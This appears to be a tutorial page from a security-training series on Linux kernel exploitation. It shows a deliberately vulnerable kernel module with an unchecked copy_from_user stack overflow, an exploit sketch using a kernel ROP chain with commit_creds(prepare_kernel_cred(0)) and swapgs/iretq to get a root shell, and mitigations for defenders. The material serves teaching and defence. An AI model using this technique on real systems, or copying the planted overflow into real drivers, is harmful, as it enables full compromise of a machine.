Skip to content

Kernel Exploitation: From a Bug to root

A kernel memory-corruption bug is about privilege, not a shell. The credential model, the commit_creds(prepare_kernel_cred(0)) payload, and returning cleanly to userspace — in a lab VM.

Published on 3 min read

This is the first walkthrough in the Kernel Exploitation area. Everything you learned in the x86-64 and ARM64 areas about overflows and control-flow hijacking still applies — but the target is the operating-system kernel, and the prize is not a shell, it is privilege.

Kernel bugs crash the whole machine, not one process. Do this only in a disposable virtual machine you can revert, against a kernel module you wrote. A panic is expected and normal while developing an exploit. See the lab rules.

The model: ring 3 asks, ring 0 acts

User programs (ring 3) cannot touch hardware or other processes' memory directly. They ask the kernel (ring 0) to act on their behalf through system calls. The kernel runs with full privilege and can see every process's memory. A memory-corruption bug reachable from a syscall therefore gives an attacker code execution in the most privileged context on the machine.

The attacker already runs code as an unprivileged user. The question is only how to turn a kernel bug into root.

How the kernel represents privilege

Every task has a struct cred holding its uid, gid and capabilities. Root is simply a cred with uid == 0 and full capabilities. Linux exposes two functions that, together, are the privilege-escalation primitive:

The canonical Linux privilege-escalation payload
prepare_kernel_cred(0)allocate a fresh cred with root ids
returns a cred*
commit_creds(cred)install it on the current task
current task is now uid 0
return to userspaceswapgs ; iretq back to ring 3
uid 0 in ring 3
execve("/bin/sh")a root shell
codelibrarydata

If we can make the kernel execute commit_creds(prepare_kernel_cred(0)), the process that entered the kernel becomes root. Then we return to userspace and run a shell.

The target: a vulnerable kernel module

CTF and practice kernels ship a deliberately vulnerable Loadable Kernel Module (LKM) exposing a device with a bug. A minimal stack overflow via a write handler:

/* vuln.c — a deliberately vulnerable LKM (lab only). */
static ssize_t vuln_write(struct file *f, const char __user *buf,
                          size_t len, loff_t *off) {
    char local[64];
    copy_from_user(local, buf, len);   /* the bug: len is attacker-controlled */
    return len;
}

copy_from_user(local, buf, len) with an attacker-controlled len overflows the 64-byte kernel-stack buffer — the stack overflow you already know, but on the kernel stack, overwriting a saved return address that the CPU will follow in ring 0.

The exploit shape

/* exploit.c — runs as an unprivileged user in the lab VM. */
// 1) Save userspace state to return to after the privesc.
save_state();                 // stash user cs, ss, rsp, rflags via inline asm

// 2) Build a kernel ROP chain in the overflow that runs:
//      rdi = 0; call prepare_kernel_cred
//      rdi = rax; call commit_creds
//      swapgs; iretq  -> back to user shell()
unsigned long payload[N];
size_t i = OFFSET / 8;        // offset to the saved return address
payload[i++] = pop_rdi;       payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
payload[i++] = pop_rdi_from_rax_trampoline;  // move rax -> rdi
payload[i++] = commit_creds;
payload[i++] = swapgs_ret;
payload[i++] = iretq;
payload[i++] = (unsigned long)shell;   // saved RIP
payload[i++] = user_cs; payload[i++] = user_rflags;
payload[i++] = user_sp; payload[i++] = user_ss;

int fd = open("/dev/vuln", O_RDWR);
write(fd, payload, sizeof(payload));   // trigger the overflow
// after iretq we land in shell() as root:
void shell(void){ if (getuid()==0) system("/bin/sh"); }

Kernel symbol addresses (prepare_kernel_cred, commit_creds) come from /proc/kallsyms on an unhardened kernel, or a leak (the next guides cover when they are hidden). The result:

$ ./exploit
[*] saved user state
[*] triggering overflow...
# id
uid=0(root) gid=0(root) groups=0(root)

Turn the mitigations back on

Each kernel mitigation removes one convenience this exploit relied on:

MitigationEffect on this exploit
kptr_restrict / dmesg_restrictHides /proc/kallsyms and log pointers — you must leak symbol addresses
KASLRRandomizes the kernel base; one leak derandomizes the whole image
Kernel stack canary (CONFIG_STACKPROTECTOR)Detects the stack overflow before the return
SMEP / SMAPStop the kernel executing or reading userspace — the next guide
KPTIUnmaps the kernel from user page tables — the third guide

What this teaches a defender

  • A kernel bug is a full-machine compromise. There is no privilege boundary above root. Treat any kernel-reachable memory-corruption bug as maximum severity, including in drivers and out-of-tree modules.
  • Attack surface is the lever. Most kernel LPEs are in drivers, filesystems and niche syscalls, not core code. Reducing reachable surface (seccomp, lockdown, disabling unused modules) removes whole bug classes from reach.
  • Enable the config options. CONFIG_STACKPROTECTOR_STRONG, KASLR, SMEP/SMAP, and the hardening in the third guide are the kernel equivalents of the userland flags in binary hardening flags.

Key takeaways

  • Kernel exploitation turns a syscall-reachable memory bug into privilege, not a shell.
  • Privilege lives in struct cred; commit_creds(prepare_kernel_cred(0)) makes the current task root.
  • After the privesc you must return to ring 3 with saved user state via swapgs ; iretq.
  • Work only in a revertible VM; the mitigations that follow (SMEP, SMAP, KASLR, KPTI) each remove a step this relied on.

Next: ret2usr, SMEP and SMAP, the defences that stop the kernel from trusting userspace memory.

Related guides

0x9000 · Kernel Exploitation

ret2usr, SMEP and SMAP

The kernel once trusted userspace memory, so exploits just pointed kernel execution at a user payload. SMEP and SMAP ended that — and how kernel ROP works around them.

0x9000 · Kernel Exploitation

KASLR, KPTI and Modern Kernel Defenses

Kernel address randomization, page-table isolation, and the config options that harden a Linux kernel against memory-corruption exploits — what each one stops and how to enable it.

0xa000 · Windows Exploitation

Bypassing DEP on Windows with ROP

DEP makes stack shellcode unrunnable, so a Windows ROP chain calls VirtualProtect to mark the shellcode region executable, then jumps to it. Build it with mona, then see ASLR and CFG respond.